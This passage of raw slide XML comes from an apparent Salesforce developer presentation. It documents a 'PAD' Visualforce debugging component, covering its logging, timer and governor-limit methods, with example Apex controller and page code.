              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>Log__c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>Content__c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0"/>
              <a:t>);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		               insert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>;return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>Id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0"/>
              <a:t>;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		       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0"/>
              <a:t>}else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0"/>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t> null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0"/>
              <a:t>;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		}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="11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C:\DOCUME~1\sbin\LOCALS~1\Temp\SNAGHTML56bf5a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6550"/>
            <a:ext cx="87630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8" y="1162050"/>
            <a:ext cx="8482012" cy="4019550"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" smtClean="0"/>
              <a:t>At the end of your Visualforce page, simply add : &lt;c:PAD /&gt;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Each call to the server will require to rerender the &lt;PAD&gt; component  with :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" smtClean="0"/>
              <a:t>rerender="PAD"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="fr-FR" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" smtClean="0"/>
              <a:t>Available javascript function on a Visualforce page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" smtClean="0"/>
              <a:t>PAD_lock()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2057400" lvl="4" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" smtClean="0"/>
              <a:t>display a transparent gray layer to prevent the user from interacting with the page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" smtClean="0"/>
              <a:t>PAD_unlock</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2057400" lvl="4" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" smtClean="0"/>
              <a:t>remove the transparent gray layer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="fr-FR" sz="1800" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24580" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="5867400"/>
            <a:ext cx="1066800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1" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="5867400"/>
            <a:ext cx="1143000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5867400" y="5867400"/>
            <a:ext cx="1143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/>
          <a:p>
            <a:pPr marL="39688" indent="-39688">
              <a:defRPr/>
            </a:pP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&lt;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Using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PAD Component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with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VisualForce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1/4&gt;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fr-FR" sz="2000" smtClean="0"/>
              <a:t>Available methods on a controller, extension :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" smtClean="0"/>
              <a:t>PAD.Log( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" smtClean="0"/>
              <a:t>String | Integer , [ String | Integer ], [ CSS description]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" smtClean="0"/>
              <a:t> )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" smtClean="0"/>
              <a:t>Display a Message / Reason on the Visualforce page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0"/>
              <a:t>PAD.Log('A message WITHOUT a reason');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0"/>
              <a:t>PAD.Log('A message WITH an Integer reason',1000);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0"/>
              <a:t>PAD.Log(2000,'A reason');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" smtClean="0"/>
              <a:t>The string can be HTML :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" smtClean="0"/>
              <a:t>PAD.Log('&lt;i&gt;A message in italic&lt;/i&gt;','A reason');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" smtClean="0"/>
              <a:t>The optionnal CSS description that will apply on the whole line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0"/>
              <a:t>PAD.Log('A message with CSS','A reason with CSS','background-color:#9999DD');</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="140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/>
          <a:p>
            <a:pPr marL="39688" indent="-39688">
              <a:defRPr/>
            </a:pP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&lt;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Using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PAD Component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with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VisualForce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2/4&gt;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&lt;Using PAD Component with VisualForce 3/4&gt;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62050"/>
            <a:ext cx="4800600" cy="5695950"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" smtClean="0"/>
              <a:t>Available methods on a controller extension:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="fr-FR" sz="1600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" smtClean="0"/>
              <a:t>PAD.startTimer();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="896938" lvl="4" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" smtClean="0"/>
              <a:t>Starts a timer and display a picture on the component</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="fr-FR" sz="1400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" smtClean="0"/>
              <a:t>PAD.stopTimer();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="896938" lvl="4" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" smtClean="0"/>
              <a:t>Display the time elapsed since the timer was started</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="896938" lvl="4" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" smtClean="0"/>
              <a:t>If you want to stop and restart the timer (timer reset), you will put another PAD.startTimer();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" smtClean="0"/>
              <a:t>PAD.Limits();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="896938" lvl="4" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" smtClean="0"/>
              <a:t>displays all the governor limits on the component</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="896938" lvl="4" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" smtClean="0"/>
              <a:t>orange line : you used more than 50% of the governor limit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="896938" lvl="4" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" smtClean="0"/>
              <a:t>red line : you used more than 80% of the governor limit</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="896938" lvl="4" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="fr-FR" sz="1000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="896938" lvl="4" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1000" smtClean="0"/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5029200" y="1295400"/>
            <a:ext cx="3962400" cy="1233488"/>
            <a:chOff x="928" y="3150"/>
            <a:chExt cx="2872" cy="1017"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26630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" y="3150"/>
              <a:ext cx="2872" cy="10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>
              <a:off x="3080" y="4157"/>
              <a:ext cx="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>
              <a:off x="3080" y="3349"/>
              <a:ext cx="5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9925"/>
            <a:ext cx="394970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213" y="968375"/>
            <a:ext cx="4319587" cy="4670425"/>
          </a:xfr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8000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> PAD_ExampleController</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> DateTime getaTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> System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now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();}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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> PAD_Log_Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(){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startTimer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for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000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Integer i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FF8000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>100000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++){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;}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Savepoint sp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r>
              <a:rPr lang="fr-FR" sz="700" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for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000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Integer i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FF8000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4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r>
              <a:rPr lang="fr-FR" sz="700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>++){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sp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Database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setSavepoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();}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DescribeFieldResult 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F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Schema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SObjectType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Account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fields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Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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'A message WITH a reason'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808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'A reason'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'A message WITHOUT a reason'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'A message WITH an Integer reason'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FF8000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1000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FF8000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2000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808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'A reason'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FF8000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2000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FF8000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1000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FF8000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2000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'&lt;i&gt;A message in italic&lt;/i&gt;'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808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'A reason'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stopTimer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();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'A message with CSS'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808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'A reason with CSS'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'background-color:#9999DD'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Log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'&lt;a href="http://google.fr" target="_blank"&gt;This is a link&lt;/a&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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	PAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Limits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="7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fr-FR" sz="700" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="700" smtClean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876800" y="968375"/>
            <a:ext cx="4114800" cy="2252663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50000">
                <a:schemeClr val="bg1"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="E8E8E8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139489" bIns="63500"/>
          <a:lstStyle/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&lt;apex:page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controller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« PAD_ExampleController"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 b="1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	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&lt;apex:form&gt;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 b="1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	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&lt;apex:commandButton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value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« PAD Example"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onclick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« PAD_lock();"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oncomplete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« PAD_unlock();"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rerender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"aText,PAD"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action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"{!PAD_Log_Example}"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/&gt;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 b="1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	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&lt;/apex:form&gt;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 b="1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	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&lt;apex:outputtext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id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"aText"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FF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value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=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="8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"{!aTime}"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/&gt;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 b="1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	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&lt;br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/&gt;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&lt;c:PAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000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 </a:t>
            </a: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/&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="900" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49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354013" indent="-342900"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r>
              <a:rPr lang="fr-FR" sz="900">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;/apex:page&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="900">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="ＭＳ Ｐゴシック"/>
              <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2005013" lvl="4" indent="-228600">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="6B6B6B"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="900">
              <a:solidFill>
                <a:srgbClr val="6B6B6B"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="ＭＳ Ｐゴシック"/>
              <a:sym typeface="Arial" pitchFamily="34" charset="0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776413" y="5729288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Controller example</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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6400800" y="3214688"/>
            <a:ext cx="165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Page example</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27654" name="Picture 12" descr="C:\DOCUME~1\sbin\LOCALS~1\Temp\SNAGHTML6abad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41148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/>
          <a:p>
            <a:pPr marL="39688" indent="-39688">
              <a:defRPr/>
            </a:pP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&lt;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Using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PAD Component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with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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" b="1" kern="0" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>VisualForce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" b="1" kern="0" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> 4/4&gt;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&lt;PAD&gt; related to the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Same principle occurs related to configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Validation Rules must be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>bypassable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Workflow Rules must be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
